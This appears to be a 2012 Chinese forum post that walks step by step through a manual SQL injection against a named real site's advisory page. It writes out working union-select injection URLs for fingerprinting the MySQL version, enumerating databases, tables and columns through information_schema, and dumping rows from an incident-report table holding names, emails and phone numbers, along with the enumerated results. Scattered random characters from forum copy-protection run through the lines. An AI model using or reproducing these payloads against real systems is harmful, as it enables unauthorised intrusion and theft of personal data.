1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询0 E) }* v+ ^# e
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解3 s" P2 s* E. f$ ]1 V/ v& U& _
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--) Y1 R8 w) L, P8 a/ n
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
0 T% x, ]3 D3 \. f1 V4 ~数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
( F$ s: B9 o1 ^& |. z4.判断有没有写权限
: N: K" u3 [2 d. N' X0 m$ X& thttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限# g# v! Z! [6 F; r7 \ X- d6 n
没办法,手动猜表啦# z- _+ J4 R4 [- M! a
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
+ W: q- C) \ R2 b. _% x但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下& V( I/ ?$ N& C u% q% C3 L
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
1 X# q N/ ]8 V$ e9 Y成功查出所有数据库,国外的黑客就是不一般。数据库如下:" f0 Z4 a) c4 r+ }5 }9 c
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb$ J+ t$ C9 `8 ~
6.爆表,爆的是twcert库
' U- n1 G) ?8 S+ I$ S @: |: ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
7 L9 t4 k; u5 g) y$ s爆出如下表
/ ] f1 R* J' F. f7 H5 vdownloadfile,irsys,newsdata,secrpt,secrpt_big55 U* Y4 P1 G! a+ R9 b) x+ U4 y+ m
7.爆列名,这次爆的是irsys表
I, j9 P" S* O* A) K {http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--8 ~; O0 ~8 L2 w
爆出如下列6 d0 X% g3 |' N: p( t" y3 v
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
: d' J5 _8 V! H0 n7 C) ]6 [! R8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
7 z' D/ d2 c" Lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
4 v/ T9 A+ ^' o: z9 w# A/ p# V返回是3,说明每个列里有3个地段
2 [# \! w; n% V% O9.爆字段内容6 @3 S% F8 d1 a* [6 Y" A5 p
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--/ y. z3 ?4 ~6 e! Y" h8 q
爆出name列的第一个字段的内容- T) h2 A* K( n. r1 d- a
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--* ~7 o- r2 {9 }9 m
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对